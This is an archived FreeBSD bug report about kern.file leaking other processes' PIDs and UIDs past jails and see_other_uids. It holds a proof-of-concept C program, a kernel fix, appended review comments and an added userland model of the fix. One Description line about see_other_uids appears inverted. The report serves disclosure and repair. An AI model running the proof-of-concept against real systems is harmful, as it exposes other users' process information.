From owner-freebsd-bugs@FreeBSD.ORG Tue Jul 8 02:50:17 2003
Return-Path:
Delivered-To: freebsd-bugs@hub.freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 97A1A37B401 for ; Tue, 8 Jul 2003 02:50:17 -0700 (PDT)
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A507043F75 for ; Tue, 8 Jul 2003 02:50:16 -0700 (PDT) (envelope-from gnats@FreeBSD.org)
Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.9/8.12.9) with ESMTP id h689oGUp054838 for ; Tue, 8 Jul 2003 02:50:16 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org)
Received: (from gnats@localhost) by freefall.freebsd.org (8.12.9/8.12.9/Submit) id h689oGF8054837; Tue, 8 Jul 2003 02:50:16 -0700 (PDT)
Resent-Date: Tue, 8 Jul 2003 02:50:16 -0700 (PDT)
Resent-Message-Id: <200307080950.h689oGF8054837@freefall.freebsd.org>
Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer)
Resent-To: freebsd-bugs@FreeBSD.org
Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Pawel Jakub Dawidek
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 779DE37B404; Tue, 8 Jul 2003 02:46:37 -0700 (PDT)
Received: from milla.ask33.net (milla.ask33.net [217.197.166.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id A669F43FA3; Tue, 8 Jul 2003 02:46:36 -0700 (PDT) (envelope-from nick@milla.ask33.net)
Received: by milla.ask33.net (Postfix, from userid 1001) id E023E3ABB4D; Tue, 8 Jul 2003 11:51:29 +0200 (CEST)
Message-Id: <20030708095129.E023E3ABB4D@milla.ask33.net>
Date: Tue, 8 Jul 2003 11:51:29 +0200 (CEST)
From: Pawel Jakub Dawidek
To: FreeBSD-gnats-submit@FreeBSD.org
X-Send-Pr-Version: 3.113
cc: rwatson@FreeBSD.org
Subject: kern/54211: Seeing other uid with kern.file sysctl.
X-BeenThere: freebsd-bugs@freebsd.org
X-Mailman-Version: 2.1.1
Precedence: list
Reply-To: Pawel Jakub Dawidek
List-Id: Bug reports
List-Unsubscribe: ,
List-Archive:
List-Post:
List-Help:
List-Subscribe: ,
X-List-Received-Date: Tue, 08 Jul 2003 09:50:18 -0000

>Number:         54211
>Category:       kern
>Synopsis:       Seeing other uid with kern.file sysctl.
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    freebsd-bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Jul 08 02:50:16 PDT 2003
>Closed-Date:
>Last-Modified:
>Originator:     Pawel Jakub Dawidek
>Release:        FreeBSD 5.1-CURRENT i386
>Organization:
>Environment:
System: FreeBSD czort.hell.none 5.1-CURRENT FreeBSD 5.1-CURRENT #6: Mon Jul 7 18:59:08 CEST 2003 root@czort.hell.none:/usr/obj/usr/src/sys/CZORT i386
>Description:
There is a way to get the PIDs and UIDs of most of the running processes even if we are in a jail or are an unprivileged user, but security.bsd.see_other_uids is set to 1. The only condition is that the process has to have open files. We can use for this the sysctl kern.file, which doesn't check whether the calling process can see the other process. This bug doesn't seem to exist in FreeBSD 4.x, because the credentials and PID of the process aren't exported to userland there, while in 5.x they are, via the xfile struct.
>How-To-Repeat:
Here is a little program which shows how to use it.
Should be run as follows:

# gcc -Wall -o xfilehack xfilehack.c
# jail / temp 127.0.0.1 `pwd`/xfilehack | uniq

---[ start of xfilehack.c ]---
/* The header names were lost in extraction; these are the ones the code needs. */
#include <sys/param.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <errno.h>
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(int argc, char *argv[])
{
	struct xfile *files;
	const char *comm;
	size_t fsize = 0;
	int i;

	comm = basename(argv[0]);
	/* First call: ask the kernel how large the kern.file table is. */
	if (sysctlbyname("kern.file", NULL, &fsize, NULL, 0) != 0) {
		fprintf(stderr, "%s: %s\n", comm, strerror(errno));
		exit(EXIT_FAILURE);
	}
	files = malloc(fsize);
	if (files == NULL) {
		fprintf(stderr, "%s: %s\n", comm, strerror(ENOMEM));
		exit(EXIT_FAILURE);
	}
	/* Second call: fetch the struct xfile entries themselves. */
	if (sysctlbyname("kern.file", files, &fsize, NULL, 0) != 0) {
		fprintf(stderr, "%s: %s\n", comm, strerror(errno));
		exit(EXIT_FAILURE);
	}
	fsize /= sizeof(struct xfile);
	/* Every entry carries the PID and effective UID of the process holding the file. */
	printf("PID EUID\n");
	for (i = 0; i < (int)fsize; ++i)
		printf("%d %u\n", (int)files[i].xf_pid, (unsigned)files[i].xf_uid);
	exit(EXIT_SUCCESS);
}
---[ end of xfilehack.c ]---

>Fix:
This patch fixes the problem:

diff -ur /usr/src/sys/kern/kern_descrip.c src/sys/kern/kern_descrip.c --- /usr/src/sys/kern/kern_descrip.c Mon Jul 7 22:11:49 2003 +++ src/sys/kern/kern_descrip.c Tue Jul 8 02:26:16 2003 @@ -2284,6 +2284,8 @@ n = 16; /* A slight overestimate. */ sx_slock(&filelist_lock); LIST_FOREACH(fp, &filehead, f_list) { + if (cr_cansee(req->td->td_ucred, fp->f_cred) != 0) + continue; /* * We should grab the lock, but this is an * estimate, so does it really matter? @@ -2301,6 +2303,10 @@ sx_slock(&allproc_lock); LIST_FOREACH(p, &allproc, p_list) { PROC_LOCK(p); + if (cr_cansee(req->td->td_ucred, p->p_ucred) != 0) { + PROC_UNLOCK(p); + continue; + } xf.xf_pid = p->p_pid; xf.xf_uid = p->p_ucred->cr_uid; PROC_UNLOCK(p);

>Release-Note:
>Audit-Trail:
>Unformatted:
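Review bot: the filter added to the sizing loop (hunk @@ -2284,6 +2284,8 @@) keys on fp->f_cred, the credential the file was opened with, while the second hunk filters the emitted entries on p->p_ucred, the credential of the process that holds the descriptor; the two can differ (a descriptor inherited across a credential change or received over a socket), so the first pass can now count fewer entries than the second pass writes. The comment already calls n "a slight overestimate" whose only job is to size the caller's buffer, so either leave this loop unfiltered or filter it on the same credential as the emitting loop; otherwise a caller that sizes with one sysctl call and reads with the next can end up with a buffer that is too small.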
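Review bot: the check in hunk @@ -2301,6 +2303,10 @@ sits correctly under PROC_LOCK(p) with the unlock before continue, but the kernel already wraps exactly this pattern as p_cansee(td, p), which asserts the proc lock is held and calls cr_cansee(td->td_ucred, p->p_ucred); writing it as `if (p_cansee(req->td, p) != 0) {` keeps this sysctl consistent with the other process-enumeration paths. A one-line comment above the check saying that this is what makes kern.file honour jail and security.bsd.see_other_uids would also help the next reader, since nothing else in the function hints at it.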
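The visibility rule the Description says kern.file was missing, and the Fix adds, written out as a userland model so the before and after can be compared on a constructed process table. This is an added example, not FreeBSD kernel code and not part of this PR: struct cred, cansee(), export_unfiltered(), export_filtered(), leak_count() and visible_count() are hypothetical stand-ins for ucred, cr_cansee() and the sysctl_kern_file() loop before and after the patch, and the jail and see_other_uids rules in cansee() are a simplification (real uid comparison, root exempt, a jailed caller confined to its own jail).

```c
/* Userland model of the visibility check the PR's patch adds to kern.file.
 * Added example, not FreeBSD kernel code: struct cred, cansee() and the two
 * export functions are hypothetical stand-ins for ucred, cr_cansee() and the
 * sysctl_kern_file() loop before and after the patch. */
#include <stddef.h>
#include <stdio.h>

struct cred {
	unsigned uid;		/* real uid of the subject */
	int jail;		/* 0 = host, otherwise jail id */
};

struct xfile_entry {		/* what kern.file exports per open file */
	int pid;
	struct cred cr;
};

static int see_other_uids = 1;	/* models security.bsd.see_other_uids */

/* Model of cr_cansee(u1, u2): may a subject with cred u1 see one with u2?
 * Simplified rules: a jailed caller sees only its own jail; root is exempt
 * from see_other_uids; everyone else needs a matching uid when it is 0. */
static int cansee(const struct cred *u1, const struct cred *u2)
{
	if (u1->jail != 0 && u1->jail != u2->jail)
		return (0);
	if (!see_other_uids && u1->uid != 0 && u1->uid != u2->uid)
		return (0);
	return (1);
}

/* Pre-patch behaviour: every entry is copied out, whoever asks. */
static size_t export_unfiltered(const struct xfile_entry *in, size_t n,
    const struct cred *caller, struct xfile_entry *out)
{
	(void)caller;
	for (size_t i = 0; i < n; i++)
		out[i] = in[i];
	return (n);
}

/* Post-patch behaviour: entries the caller may not see are skipped. */
static size_t export_filtered(const struct xfile_entry *in, size_t n,
    const struct cred *caller, struct xfile_entry *out)
{
	size_t k = 0;
	for (size_t i = 0; i < n; i++)
		if (cansee(caller, &in[i].cr))
			out[k++] = in[i];
	return (k);
}

/* Constructed process table: host processes plus two inside jail 7. */
static const struct xfile_entry sample[] = {
	{ 100, { 0,    0 } },	/* root daemon on the host */
	{ 200, { 1001, 0 } },	/* the unprivileged caller's own processes */
	{ 201, { 1001, 0 } },
	{ 300, { 1002, 0 } },	/* another user on the host */
	{ 400, { 1001, 7 } },	/* same uid, but inside jail 7 */
	{ 401, { 0,    7 } },	/* root inside jail 7 */
};
#define	NSAMPLE	(sizeof(sample) / sizeof(sample[0]))

/* Export for a caller (uid, jail) under a policy; count foreign-uid entries. */
static size_t leak_count(int policy, int filtered, unsigned uid, int jail)
{
	struct xfile_entry out[NSAMPLE];
	struct cred caller = { uid, jail };
	size_t n, leaked = 0;
	see_other_uids = policy;
	n = filtered ? export_filtered(sample, NSAMPLE, &caller, out)
	    : export_unfiltered(sample, NSAMPLE, &caller, out);
	for (size_t i = 0; i < n; i++)
		if (out[i].cr.uid != uid)
			leaked++;
	return (leaked);
}

/* Number of entries the patched export hands to that caller at all. */
static size_t visible_count(int policy, unsigned uid, int jail)
{
	struct xfile_entry out[NSAMPLE];
	struct cred caller = { uid, jail };
	see_other_uids = policy;
	return (export_filtered(sample, NSAMPLE, &caller, out));
}

int main(void)
{
	printf("uid 1001, see_other_uids=0: %zu foreign uids before, %zu after\n",
	    leak_count(0, 0, 1001, 0), leak_count(0, 1, 1001, 0));
	printf("jailed uid 1001, see_other_uids=1: %zu of %zu entries foreign\n",
	    leak_count(1, 1, 1001, 7), visible_count(1, 1001, 7));
	return (0);
}
```

Build with cc -Wall and run: the first line shows that the unfiltered export hands an unprivileged host user entries for root and uid 1002 even with see_other_uids set to 0, and that the filtered export returns none of them; the second line shows that a jailed caller is confined to its jail's entries regardless of the see_other_uids setting, which is the jail half of the Description. The model keeps the two credential checks (jail, then uid) in the same order the kernel applies them, so an entry is hidden as soon as either rule fails.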